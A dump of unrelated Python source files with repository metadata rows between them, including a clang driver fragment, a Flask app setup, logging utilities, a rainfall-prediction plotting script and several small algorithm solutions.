assert(output_type in ('pp','ll','po','s','o'))
cur_type = input_type
# source file -> pp
if filetype.IsSourceType(cur_type) and output_type == 'pp':
chain.add(RunCC, 'cpp', mode='-E')
cur_type = 'pp'
if cur_type == output_type:
return
# header file -> pre-process
if filetype.IsHeaderType(cur_type) and output_type == 'pp':
chain.add(RunCC, 'cpp', mode='-E')
cur_type = 'pp'
if cur_type == output_type:
return
# source file -> ll
if (filetype.IsSourceType(cur_type) and
(env.getbool('FORCE_INTERMEDIATE_LL') or output_type == 'll')):
chain.add(RunCC, 'll', mode='-S')
cur_type = 'll'
if cur_type == output_type:
return
# ll -> po
if cur_type == 'll':
chain.add(RunLLVMAS, 'po')
cur_type = 'po'
if cur_type == output_type:
return
# source file -> po (we also force native output to go through this phase
if filetype.IsSourceType(cur_type) and output_type in ('po', 'o', 's'):
chain.add(RunCC, 'po', mode='-c')
cur_type = 'po'
if cur_type == output_type:
return
# po -> o
if (cur_type == 'po' and output_type == 'o'):
# If we aren't using biased bitcode, then at least -expand-byval
# must be run to work with the PPAPI shim calling convention.
if IsPortable():
chain.add(RunOpt, 'expand.po', pass_list=['-expand-byval'])
chain.add(RunTranslate, 'o', mode='-c')
cur_type = 'o'
if cur_type == output_type:
return
# po -> s
if cur_type == 'po':
# If we aren't using biased bitcode, then at least -expand-byval
# must be run to work with the PPAPI shim calling convention.
if IsPortable():
chain.add(RunOpt, 'expand.po', pass_list=['-expand-byval'])
chain.add(RunTranslate, 's', mode='-S')
cur_type = 's'
if cur_type == output_type:
return
# S -> s
if cur_type == 'S':
chain.add(RunCC, 's', mode='-E')
cur_type = 's'
if output_type == 'pp':
return
if cur_type == output_type:
return
# s -> o
if cur_type == 's' and output_type == 'o':
chain.add(RunNativeAS, 'o')
cur_type = 'o'
if cur_type == output_type:
return
Log.Fatal("Unable to compile .%s to .%s", input_type, output_type)
def get_help(argv):
tool = env.getone('SCRIPT_NAME')
if '--help-full' in argv:
# To get ${CC}, etc.
env.update(EXTRA_ENV)
code, stdout, stderr = Run('"${CC}" -help',
redirect_stdout=subprocess.PIPE,
redirect_stderr=subprocess.STDOUT,
errexit=False)
return stdout
else:
return """
This is a "GCC-compatible" driver using clang under the hood.
Usage: %s [options] <inputs> ...
BASIC OPTIONS:
-o <file> Output to <file>.
-E Only run the preprocessor.
-S Generate bitcode assembly.
-c Generate bitcode object.
-I <dir> Add header search path.
-L <dir> Add library search path.
-D<key>[=<val>] Add definition for the preprocessor.
-W<id> Toggle warning <id>.
-f<feature> Enable <feature>.
-Wl,<arg> Pass <arg> to the linker.
-Xlinker <arg> Pass <arg> to the linker.
-Wt,<arg> Pass <arg> to the translator.
-Xtranslator <arg> Pass <arg> to the translator.
-Wp,<arg> Pass <arg> to the preprocessor.
-Xpreprocessor,<arg> Pass <arg> to the preprocessor.
-x <language> Treat subsequent input files as having type <language>.
-static Produce a static executable (the default).
-Bstatic Link subsequent libraries statically.
-Bdynamic Link subsequent libraries dynamically.
-fPIC Ignored (only used by translator backend)
(accepted for compatibility).
-pipe Ignored (for compatibility).
-O<n> Optimation level <n>: 0, 1, 2, 3, 4 or s.
-g Generate complete debug information.
-gline-tables-only Generate debug line-information only
(allowing for stack traces).
-flimit-debug-info Generate limited debug information.
-save-temps Keep intermediate compilation results.
-v Verbose output / show commands.
-h | --help Show this help.
--help-full Show underlying clang driver's help message
(warning: not all options supported).
""" % (tool)
| [
"[email protected]"
] | |
6235ff1283a1cd1df9f2920ac2d4acc0b4fda5f2 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_tubercles.py | 1fd9350940d02997c44f6017604e905edf183a0b | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py |
#calss header
class _TUBERCLES():
def __init__(self,):
self.name = "TUBERCLES"
self.definitions = tubercle
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['tubercle']
| [
"[email protected]"
] | |
d93f1eac9a51b554e79f2210ef4ec9efb9dc75e3 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02785/s616461833.py | e25ba5505a0fe199b73bcb1668bb380fc510363a | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | n, k = map(int, input().split())
h = list(map(int, input().split()))
print(sum(sorted(h)[::-1][k:])) | [
"[email protected]"
] | |
23259865da4b2ba2241e13dc4a003730ecd8244e | f483545d7765c25d1b315027726dbd74bc77b98a | /myproject/helloflask/__init__.py | 3c841b6144c426d612c3be2276bab54c47abc33d | [] | no_license | niceman5/pythonProject | e51b44a50776100a63443d7da850ba4b8b00f5eb | 3589fd200b56f68b856d2b4d2031c2a1135168a0 | refs/heads/master | 2023-07-10T16:12:57.756944 | 2023-06-27T08:13:54 | 2023-06-27T08:13:54 | 135,047,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,573 | py | from flask import Flask, g, request, Response, make_response
from flask import session, render_template, Markup, url_for
from datetime import date, datetime, timedelta
import os
from helloflask.init_db import init_database, db_session
app = Flask(__name__)
import helloflask.views
import helloflask.tests
import helloflask.filters
app.debug = True
app.jinja_env.trim_blocks = True
# config["connect_args"] = {"options": "-c timezone=utc"}
def dated_url_for(endpoint, **values):
if endpoint == 'static':
filename = values.get('filename', None)
if filename:
file_path = os.path.join(app.root_path,
endpoint, filename)
values['q'] = int(os.stat(file_path).st_mtime)
return url_for(endpoint, **values)
@app.context_processor
def override_url_for():
return dict(url_for=dated_url_for)
app.config.update(
connect_args={"options": "-c timezone=utc"},
SECRET_KEY='X1243yRH!mMwf',
SESSION_COOKIE_NAME='pyweb_flask_session',
PERMANENT_SESSION_LIFETIME=timedelta(31) # 31 days
)
@app.before_first_request
def beforeFirstRequest():
print(">> before_first_request!!")
init_database() # initialize database
@app.after_request
def afterReq(response):
print(">> after_request!!")
return response
@app.teardown_request
def teardown_request(exception):
print(">>> teardown request!!", exception)
@app.teardown_appcontext
def teardown_context(exception):
print(">>> teardown context!!", exception)
db_session.remove() # remove used db-session
| [
"[email protected]"
] | |
7e0e11a25de222a5998cf039e5d07b16e1e5ee3d | 0cfb5831a748ebd46e438e3ad7e7a09c1d196499 | /com/chapter_02/section_03/task_2.3.1_string.py | 0ced5f96b6c94cd49087d941d8d2db0b958d7a97 | [] | no_license | StevenGeGe/pythonFromIntroductionToPractice01 | 7cfe8cdb4bc5c0ddbe25b44976231d72d9e10108 | 9d2ba499056b30ded14180e6c4719ee48edd9772 | refs/heads/master | 2023-02-15T04:08:59.878711 | 2020-12-28T13:27:55 | 2020-12-28T13:27:55 | 310,980,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2020/11/8 14:44
# @Author : Yong
# @Email : [email protected]
# @File : task_2.3.1_string.py
# @Software: PyCharm
# title() : 以首字母大写的方式显示每个单词,即将每个单词的首字母全部大写或者全部小写。
# 更改字符串的小写
name_big = "ada love"
print(name_big.title()) # 输出: Ada Love
# 更改字符串的大写
name_small = "All The World"
print(name_small.title()) # 输出: All The World
| [
"[email protected]"
] | |
4592909cbecdc99a76075adfdb88ebecd628f893 | e247d9261676f257752c0c6beac161954137a81c | /src/0670.maximum-swap/maximum-swap.py | a768dba246b1ee138757c7df172f980aba66c1ea | [
"MIT"
] | permissive | henrymorgen/Just-Code | 8fbbd8288b485372a44e10b0078b5edb8af61a3b | fa03ebb89edd8f2292de7c0644dbab88dc1d924c | refs/heads/master | 2022-10-19T05:59:53.134092 | 2020-06-10T02:26:43 | 2020-06-10T02:26:43 | 273,656,532 | 1 | 2 | MIT | 2020-06-20T07:02:38 | 2020-06-20T07:02:38 | null | UTF-8 | Python | false | false | 447 | py | class Solution:
def maximumSwap(self, num: int) -> int:
num = list(str(num))
max_idx = len(num) - 1
xi = yi = 0
for i in range(len(num) - 1, -1, -1):
if num[i] > num[max_idx]:
max_idx = i
elif num[i] < num[max_idx]:
xi = i
yi = max_idx
num[xi], num[yi] = num[yi], num[xi]
return int("".join(num)) | [
"[email protected]"
] | |
c288be163fc503676e07dbc33ab1ccc5193348d6 | f28591fab50d9b7a539c66b5a81fc91d1bc2ce64 | /py3/def/uint32_rotateleft.py | 3d8529dece0a6541a402dce9cfeefd84e5370f9e | [] | no_license | tnzw/tnzw.github.io | b8a5fe1f8479736bbf2b3594d511a1282939a3b3 | 6d95968db793cebcfa77cb49eecd987f821350db | refs/heads/master | 2023-04-21T14:22:49.849859 | 2023-03-31T15:55:01 | 2023-03-31T15:55:01 | 176,712,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 532 | py | # uint32_rotateleft.py Version 1.0.0
# Copyright (c) 2020 Tristan Cavelier <[email protected]>
# This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the Do What The Fuck You Want
# To Public License, Version 2, as published by Sam Hocevar. See
# http://www.wtfpl.net/ for more details.
def uint32_rotateleft(uint32, n):
n %= 32
if n < 0: n += 32
return (((uint32 << n) & 0xFFFFFFFF) | (uint32 >> (32 - n)))
| [
"[email protected]"
] | |
4c13c1b16129e4ea923b3a8845fa0d873f5515cb | 471c56d189c21733371fb60f3d4a13e69b6c8c0d | /plot_comp_prediction_clstm.py | ffb3a6bdfb0b40079d1f116578e2cd5e96cf6b3f | [] | no_license | inoue0406/svg | 2b3d50e17526d27b37e352a535a8468b23d5773b | 6a12e052ca9d9a54eaae1657e236259b00aabdc9 | refs/heads/master | 2020-08-13T12:25:41.729998 | 2019-11-03T06:31:06 | 2019-11-03T06:31:06 | 214,967,485 | 0 | 0 | null | 2019-10-14T06:43:43 | 2019-10-14T06:43:43 | null | UTF-8 | Python | false | false | 8,294 | py | #
# Plot Predicted Rainfall Data
# for non-probabilistic clstm model
#
import torch
import numpy as np
import torch.utils.data as data
from torch.autograd import Variable
from torch.utils.data import DataLoader
import argparse
import pandas as pd
import h5py
import os
import sys
import random
import itertools
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.colors import LinearSegmentedColormap
import utils
from jma_pytorch_dataset import *
from scaler import *
from colormap_JMA import Colormap_JMA
def inv_scaler(x):
"""
Back to original scale
"""
return (x ** 2.0)*201.0
def plot_rainfall(pic_tg,pic_pred,pic_path,fname):
# input
# pic_tg: numpy array with [time,x,y] dim
# pic_pred: numpy array with [nsmple,time,x,y] dim
print('Plotting: ',fname,np.max(pic_tg),np.max(pic_pred))
# plot
cm = Colormap_JMA()
for nt in range(pic_tg.shape[0]):
fig, ax = plt.subplots(figsize=(20, 8))
fig.suptitle("Precip prediction starting at: "+fname, fontsize=30)
#
id = nt
dtstr = str((id+1)*5)
# target
plt.subplot(1,2,1)
im = plt.imshow(pic_tg[id,:,:],vmin=0,vmax=50,cmap=cm,origin='lower')
plt.title("true:"+dtstr+"min", fontsize=30)
plt.axis('off')
plt.grid()
# predicted
plt.subplot(1,2,2)
im = plt.imshow(pic_pred[id,:,:],vmin=0,vmax=50,cmap=cm,origin='lower')
plt.title("pred:"+dtstr+"min", fontsize=30)
plt.axis('off')
plt.grid()
# color bar
fig.subplots_adjust(right=0.93,top=0.85)
cbar_ax = fig.add_axes([0.94, 0.15, 0.01, 0.7])
fig.colorbar(im, cax=cbar_ax)
# save as png
nt_str = '_dt%02d' % nt
plt.savefig(pic_path+'/'+'comp_pred_'+fname+nt_str+'.png')
plt.close()
def make_gifs(x, idx, name,frame_predictor,encoder,decoder):
all_gen = []
frame_predictor.hidden = frame_predictor.init_hidden()
x_in = x[0]
all_gen.append(x_in)
for i in range(1, opt.n_eval):
# h = encoder(x_in)
# if opt.last_frame_skip or i < opt.n_past:
# h, skip = h
# else:
# h, _ = h
# h = h.detach()
# if i < opt.n_past:
# h_target = encoder(x[i])[0].detach()
# frame_predictor(h)
# x_in = x[i]
# all_gen.append(x_in)
# else:
# h = frame_predictor(h.detach())
# x_in = decoder([h, skip]).detach()
# all_gen.append(x_in)
if i < opt.n_past:
x_in = x[i-1] # use ground truth frame for the first half
h, skip = encoder(x_in)
h = h.detach()
else:
x_in = x_pred # use predicted frame for the second half (NOT use ground truth)
_, skip = encoder(x_in)
h = h_pred
h_pred = frame_predictor(h).detach()
x_pred = decoder([h_pred, skip]).detach()
all_gen.append(x_pred)
# prep np.array to be plotted
TRU = np.zeros([opt.n_eval, opt.batch_size, 1, opt.image_width, opt.image_width])
GEN = np.zeros([opt.n_eval, opt.batch_size, 1, opt.image_width, opt.image_width])
for i in range(opt.n_eval):
TRU[i,:,:,:,:] = inv_scaler(x[i].cpu().numpy())
GEN[i,:,:,:,:] = inv_scaler(all_gen[i].cpu().numpy())
# plot
print(" ground truth max:",np.max(TRU)," gen max:",np.max(GEN))
for j in range(opt.batch_size):
plot_rainfall(TRU[:,j,0,:,:],GEN[:,j,0,:,:],opt.log_dir,name+"_sample"+str(j))
# plot comparison of predicted vs ground truth
def plot_comp_prediction(opt,df_sampled,mode='png_ind'):
print("Random Seed: ", opt.seed)
random.seed(opt.seed)
torch.manual_seed(opt.seed)
torch.cuda.manual_seed_all(opt.seed)
dtype = torch.cuda.FloatTensor
# ---------------- load the models ----------------
tmp = torch.load(opt.model_path)
frame_predictor = tmp['frame_predictor']
frame_predictor.eval()
encoder = tmp['encoder']
decoder = tmp['decoder']
encoder.train()
decoder.train()
frame_predictor.batch_size = opt.batch_size
opt.g_dim = tmp['opt'].g_dim
opt.num_digits = tmp['opt'].num_digits
# --------- transfer to gpu ------------------------------------
frame_predictor.cuda()
encoder.cuda()
decoder.cuda()
# ---------------- set the options ----------------
opt.dataset = tmp['opt'].dataset
opt.last_frame_skip = tmp['opt'].last_frame_skip
opt.channels = tmp['opt'].channels
opt.image_width = tmp['opt'].image_width
print(opt)
# --------- load a dataset ------------------------------------
# loading datasets
train_dataset = JMARadarDataset(root_dir=opt.data_root,
csv_file=opt.train_path,
tdim_use=opt.n_past,
transform=None)
valid_dataset = JMARadarDataset(root_dir=opt.data_root,
csv_file=opt.valid_path,
tdim_use=opt.n_past,
transform=None)
train_loader = DataLoader(dataset=train_dataset,
num_workers=opt.data_threads,
batch_size=opt.batch_size,
shuffle=True,
drop_last=True,
pin_memory=True)
test_loader = DataLoader(dataset=valid_dataset,
num_workers=opt.data_threads,
batch_size=opt.batch_size,
shuffle=False,
drop_last=True,
pin_memory=True)
def get_training_batch():
while True:
for sequence in train_loader:
batch = utils.normalize_data(opt, dtype, sequence)
yield batch
training_batch_generator = get_training_batch()
def get_testing_batch():
while True:
for sequence in test_loader:
batch = utils.normalize_data(opt, dtype, sequence)
yield batch
testing_batch_generator = get_testing_batch()
for i in range(0, opt.N, opt.batch_size):
print(i)
# plot train
train_x = next(training_batch_generator)
make_gifs(train_x, i, 'train',frame_predictor,encoder,decoder)
# plot test
test_x = next(testing_batch_generator)
make_gifs(test_x, i, 'test',frame_predictor,encoder,decoder)
break
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', default=100, type=int, help='batch size')
parser.add_argument('--data_root', default='data', help='root directory for data')
parser.add_argument('--train_path', default='', help='csv file containing filenames for training')
parser.add_argument('--valid_path', default='', help='csv file containing filenames for validation')
parser.add_argument('--model_path', default='', help='path to model')
parser.add_argument('--log_dir', default='', help='directory to save generations to')
parser.add_argument('--seed', default=1, type=int, help='manual seed')
parser.add_argument('--n_past', type=int, default=2, help='number of frames to condition on')
parser.add_argument('--n_future', type=int, default=28, help='number of frames to predict')
parser.add_argument('--num_threads', type=int, default=0, help='number of data loading threads')
parser.add_argument('--N', type=int, default=256, help='number of samples')
parser.add_argument('--data_threads', type=int, default=5, help='number of data loading threads')
opt = parser.parse_args()
os.makedirs('%s' % opt.log_dir, exist_ok=True)
opt.n_eval = opt.n_past+opt.n_future
opt.max_step = opt.n_eval
# samples to be plotted
sample_path = '../datasets/jma/sampled_forplot_3day_JMARadar.csv'
# read sampled data in csv
df_sampled = pd.read_csv(sample_path)
print('samples to be plotted')
print(df_sampled)
plot_comp_prediction(opt,df_sampled,mode='png_ind')
| [
"[email protected]"
] | |
5cbbcad90b7a18247ef4129e11896b12752543ab | ec827bd5df431c9400946e8d0593448814b5534b | /venv/bin/ipython | 498f13bc79c779676e375d1d51d86e95af3fa922 | [] | no_license | grantnicholas/pytone | 7acd70878de8090d06d7a2911a67b3dbb3b64256 | b89c688cc88588a3758fff288bc9b1364534b42e | refs/heads/master | 2021-01-23T06:19:47.203418 | 2014-09-21T21:52:27 | 2014-09-21T21:52:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | #!/home/grant/Desktop/pytone/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from IPython import start_ipython
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(start_ipython())
| [
"[email protected]"
] | ||
56b5cf1eaba651687a7c590fa1649daae00ec525 | 1b0755fafd5993c8fe5c847d0f3b250f0705cc87 | /perf/__init__.py | ccef7a523ee945da1eb514e9d7dade75768eb8dd | [
"MIT"
] | permissive | pombredanne/perf | 65b722b2822daf598798da40917abdc608708ec3 | da5f2259815c39569957f584a7e1e57cfdbbb927 | refs/heads/master | 2021-04-29T11:31:23.533547 | 2016-12-16T14:50:02 | 2016-12-16T14:50:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 913 | py | from __future__ import division, print_function, absolute_import
__version__ = '0.9.2'
# Clocks
try:
# Python 3.3+ (PEP 418)
from time import monotonic as monotonic_clock, perf_counter
except ImportError:
import sys
import time
monotonic_clock = time.time
if sys.platform == "win32":
perf_counter = time.clock
else:
perf_counter = time.time
del sys, time
__all__ = ['monotonic_clock', 'perf_counter']
from perf._utils import is_significant, python_implementation, python_has_jit # noqa
__all__.extend(('is_significant', 'python_implementation', 'python_has_jit'))
from perf._metadata import format_metadata # noqa
__all__.append('format_metadata')
from perf._bench import Run, Benchmark, BenchmarkSuite, add_runs # noqa
__all__.extend(('Run', 'Benchmark', 'BenchmarkSuite', 'add_runs'))
from perf._runner import Runner # noqa
__all__.append('Runner')
| [
"[email protected]"
] | |
18038f0af6c237d5b9db5678328e4d466f172dc2 | 57fec0f5928beaaeb2dc66004267204e77bf05a7 | /scripts/05-gmaps-test.py | ca95867cc5fec1d0fc87836f9afd89caf7c679cc | [] | no_license | fgolemo/neo-m8p-python | a26d382cd0a8d90bd8eca4a6a2c13a51bc1a08b9 | f9af936cdc804b24a76b697df749b0aca0325bed | refs/heads/master | 2020-06-21T09:55:13.280892 | 2019-07-25T17:36:07 | 2019-07-25T17:36:07 | 197,414,904 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | import cv2
from neom8p.gmaps import get_gmap
map = get_gmap(45.530807,-73.613293, 19)
cv2.imshow("map", map)
cv2.waitKey(1)
print ("yo") | [
"[email protected]"
] | |
41ebec25755d59ff6b7c39a02ee7b633ecb9eb93 | 24223ef61937be40f0ea23db279a93b75a0b7a0f | /pygogo/utils.py | e1c94efb0cea6c5c6bfdab9424b8a04a82d3f199 | [
"MIT"
] | permissive | liutaihua/pygogo | cfd13a036bcbdf7767fa05e31ab2161be9c6a99b | 7b7a99fdf28cef3185cf7f3f8f0cad8b8d5691b2 | refs/heads/master | 2021-01-18T01:48:15.294501 | 2016-01-01T10:58:27 | 2016-01-01T10:58:27 | 48,997,690 | 1 | 0 | null | 2016-01-04T13:08:29 | 2016-01-04T13:08:29 | null | UTF-8 | Python | false | false | 8,266 | py | # -*- coding: utf-8 -*-
# vim: sw=4:ts=4:expandtab
"""
pygogo.utils
~~~~~~~~~~~~
Misc classes and functions that don't warrant their own module
Examples:
basic usage::
>>> CustomEncoder().encode(range(5))
'[0, 1, 2, 3, 4]'
"""
from __future__ import (
absolute_import, division, print_function, with_statement,
unicode_literals)
import logging
import sys
from json import JSONEncoder
from builtins import *
module_hdlr = logging.StreamHandler(sys.stdout)
module_logger = logging.getLogger(__name__)
module_logger.addHandler(module_hdlr)
class CustomEncoder(JSONEncoder):
"""A unicode aware JSON encoder that can handle iterators, dates, and times
Examples:
>>> CustomEncoder().encode(range(5))
'[0, 1, 2, 3, 4]'
>>> from json import dumps
>>> dumps(range(5), cls=CustomEncoder)
'[0, 1, 2, 3, 4]'
"""
def default(self, obj):
""" Encodes a given object
Args:
obj (scalar): The object to encode.
Returns:
The encoded object
Examples:
>>> CustomEncoder().default(range(5))
[0, 1, 2, 3, 4]
"""
if hasattr(obj, 'real'):
encoded = float(obj)
elif hasattr(obj, 'union'):
encoded = tuple(obj)
elif set(['next', 'union', '__iter__']).intersection(dir(obj)):
encoded = list(obj)
else:
encoded = str(obj)
return encoded
class StructuredMessage(object):
"""Converts a message and kwargs to a json string
Attributes:
kwargs (dict): Keyword arguments passed to
:class:`~pygogo.utils.CustomEncoder`.
Args:
message (string): The message to log.
kwargs (dict): Keyword arguments passed to
:class:`~pygogo.utils.CustomEncoder`.
Returns:
New instance of :class:`StructuredMessage`
See also:
:class:`pygogo.utils.StructuredAdapter`
Examples:
>>> from json import loads
>>> msg = StructuredMessage('hello world', key='value')
>>> loads(str(msg)) == {'message': 'hello world', 'key': 'value'}
True
"""
def __init__(self, message=None, **kwargs):
"""Initialization method.
Args:
message (string): The message to log.
kwargs (dict): Keyword arguments passed to
:class:`~pygogo.utils.CustomEncoder`.
Returns:
New instance of :class:`StructuredMessage`
Examples:
>>> StructuredMessage('message') # doctest: +ELLIPSIS
<pygogo.utils.StructuredMessage object at 0x...>
"""
kwargs['message'] = message
self.kwargs = kwargs
def __str__(self):
""" String method
Returns:
str: The encoded object
Examples
>>> from json import loads
>>> msg = str(StructuredMessage('hello world', key='value'))
>>> loads(msg) == {'message': 'hello world', 'key': 'value'}
True
"""
return str(CustomEncoder().encode(self.kwargs))
class StructuredAdapter(logging.LoggerAdapter):
"""A logging adapter that creates a json string from a log message and the
`extra` kwarg
See also:
:class:`pygogo.utils.StructuredMessage`
:meth:`pygogo.Gogo.get_structured_logger`
Examples:
>>> from io import StringIO
>>> from json import loads
>>> s = StringIO()
>>> logger = logging.getLogger()
>>> hdlr = logging.StreamHandler(s)
>>> logger.addHandler(hdlr)
>>> structured_logger = StructuredAdapter(logger, {'all': True})
>>> structured_logger.debug('hello', extra={'key': u'value'})
>>> loads(s.getvalue()) == {
... 'all': True, 'message': 'hello', 'key': 'value'}
True
"""
def process(self, msg, kwargs):
""" Modifies the message and/or keyword arguments passed to a logging
call in order to insert contextual information.
Args:
msg (str): The message to log.
kwargs (dict):
Returns:
Tuple of (:class:`~pygogo.utils.StructuredMessage`, modified kwargs)
Examples:
>>> from json import loads
>>> logger = logging.getLogger()
>>> structured_logger = StructuredAdapter(logger, {'all': True})
>>> extra = {'key': 'value'}
>>> m, k = structured_logger.process('message', {'extra': extra})
>>> loads(m) == {'all': True, 'message': 'message', 'key': 'value'}
True
>>> k == {'extra': {'all': True, 'key': 'value'}}
True
"""
extra = kwargs.get('extra', {})
extra.update(self.extra)
kwargs['extra'] = extra
return str(StructuredMessage(msg, **extra)), kwargs
class LogFilter(logging.Filter):
"""Filters log messages depending on level
Attributes:
level (int): The logging level.
+-------------------------+-------+
| logging level attribute | value |
+=========================+=======+
| CRITICAL | 50 |
+-------------------------+-------+
| ERROR | 40 |
+-------------------------+-------+
| WARNING | 30 |
+-------------------------+-------+
| INFO | 20 |
+-------------------------+-------+
| DEBUG | 10 |
+-------------------------+-------+
| NOTSET | 0 |
+-------------------------+-------+
Args:
level (int): The logging level.
Returns:
New instance of :class:`LogFilter`
See also:
:meth:`pygogo.Gogo.update_hdlr`
"""
def __init__(self, level):
"""Initialization method.
Args:
level (int): The logging level.
Returns:
New instance of :class:`LogFilter`
Examples:
>>> LogFilter(40) # doctest: +ELLIPSIS
<pygogo.utils.LogFilter object at 0x...>
"""
self.high_level = level
def filter(self, record):
"""Determines whether or a not a message should be logged.
Args:
record (obj): The event to (potentially) log
Returns:
bool: True if the event level is lower than self.high_level
Examples:
>>> attrs = {'levelno': logging.INFO}
>>> record = logging.makeLogRecord(attrs)
>>> LogFilter(40).filter(record)
True
"""
return record.levelno < self.high_level
def get_structured_filter(name='', **kwargs):
"""Returns a structured filter that injects contextual information into
log records.
Args:
kwargs (dict): The contextual information you wish to inject
See also:
:meth:`pygogo.Gogo.update_hdlr`
Returns:
New instance of :class:`pygogo.utils.StructuredFilter`
Examples:
>>> structured_filter = get_structured_filter(user='fred')
>>> structured_filter # doctest: +ELLIPSIS
<pygogo.utils...StructuredFilter object at 0x...>
>>>
>>> logger = logging.getLogger('structured_filter')
>>> hdlr = logging.StreamHandler(sys.stdout)
>>> formatter = logging.Formatter('User %(user)s said, "%(message)s".')
>>> hdlr.setFormatter(formatter)
>>> logger.addFilter(structured_filter)
>>> logger.addHandler(hdlr)
>>> logger.debug('A debug message')
User fred said, "A debug message".
"""
class StructuredFilter(logging.Filter):
"""
Injects contextual information into log records.
"""
def filter(self, record):
"""Adds contextual information to a log record
Args:
record (obj): The event to contextualize
Returns:
bool: True
"""
for k, v in kwargs.items():
setattr(record, k, v)
return True
return StructuredFilter(name)
| [
"[email protected]"
] | |
a47f8034e2370aec414aa1e5b290f1bff3f65fe2 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_2700486_0/Python/jbaek/codejam3.py | 66cc08fb16dc343fe03e3fc66bf66e11429e006d | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,392 | py | from math import *
from itertools import *
import os
from decimal import *
ALLGRIDS = []
def main():
global ALLGRIDS
f = open("/home/jackie/Documents/Codejam/in")
lines = f.readlines()
cases = int(lines.pop(0))
for i in range(cases):
ALLGRIDS = []
print "Case #%d:" % (i+1),
guide = split_to_int(lines)
number = guide[0]
x = guide[1]
y = guide[2]
diamonds = []
grid = {}
if x == 0 and y == 0:
print "1.0"
continue
ALLGRIDS.append(grid)
do_problem(number, diamonds)
total = len(ALLGRIDS)
win = 0
for grid in ALLGRIDS:
if x in grid and grid[x] >= y+1:
win += 1
answer = str(Decimal(win)/Decimal(total))
if "." not in answer:
answer += ".0"
print answer
def do_problem(number,diamonds):
global ALLGRIDS
for i in range(number):
for j in range(len(ALLGRIDS)):
helper(ALLGRIDS[j], 0)
# drops one diamond
def helper(grid, pos):
global ALLGRIDS
if pos not in grid:
grid[pos]=0
highest = grid[pos]
if blockedleft(grid, pos):
if blockedright(grid,pos):
grid[pos]+=2
return
else:
helper(grid, pos+1)
return
elif blockedright(grid,pos):
helper(grid, pos-1)
return
# go on ground
elif highest == 0:
grid[pos]=1
return
else:
# right
newgrid = grid.copy()
ALLGRIDS.append(newgrid)
helper(newgrid, pos+1)
# left
helper(grid, pos-1)
def blockedleft(grid, pos):
return pos-1 in grid and grid[pos-1]>grid[pos]
def blockedright(grid, pos):
return pos+1 in grid and grid[pos+1]>grid[pos]
# general helper functions
def split_to_int(lines):
return [int(v) for v in lines.pop(0).split()]
def factors(n):
return set(reduce(list.__add__,
([i, n//i] for i in range(1, int(n**0.5) + 1) if n % i == 0)))
def isPrime(n):
if n == 2 or n == 3: return True
if n < 2 or n%2 == 0: return False
if n < 9: return True
if n%3 == 0: return False
r = int(n**0.5)
f = 5
while f <= r:
if n%f == 0: return False
if n%(f+2) == 0: return False
f +=6
return True
g = {0:1, 2:1}
#helper(g, 0)
#print ALLGRIDS
main()
| [
"[email protected]"
] | |
ee9a241f9d288ae78366ae06757b0dee588ce874 | 5acc77c4d594c1750a9b7477499ee25b4c307bca | /ehpi_action_recognition/train_ehpi.py | 3c8f3b90123e199bd9a2df7439bbf06c510462ca | [
"MIT"
] | permissive | noboevbo/ehpi_action_recognition | bc15a3c260c79b85a82844a2779c9b1ec9cf42fd | 3b77eeb5103f0f11c8d4be993ec79dddad7e661c | refs/heads/master | 2021-12-29T05:24:31.891044 | 2021-12-19T16:23:36 | 2021-12-19T16:23:36 | 180,351,212 | 113 | 23 | null | 2019-04-23T11:24:27 | 2019-04-09T11:22:45 | Python | UTF-8 | Python | false | false | 3,006 | py | import os
import random
from typing import List
import torch
from ehpi_action_recognition.config import ehpi_dataset_path
from nobos_commons.data_structures.constants.dataset_part import DatasetPart
from nobos_commons.data_structures.dimension import ImageSize
from nobos_torch_lib.configs.training_configs.training_config_base import TrainingConfigBase
from nobos_torch_lib.datasets.action_recognition_datasets.ehpi_dataset import EhpiDataset, RemoveJointsOutsideImgEhpi, \
ScaleEhpi, TranslateEhpi, FlipEhpi, NormalizeEhpi
from nobos_torch_lib.datasets.samplers.imbalanced_dataset_sampler import ImbalancedDatasetSampler
from nobos_torch_lib.models.detection_models.shufflenet_v2 import ShuffleNetV2
from torch.utils.data import ConcatDataset, DataLoader
from torchvision.transforms import transforms
from ehpi_action_recognition.trainer_ehpi import TrainerEhpi
foot_indexes: List[int] = [11, 14]
knee_indexes: List[int] = [10, 13]
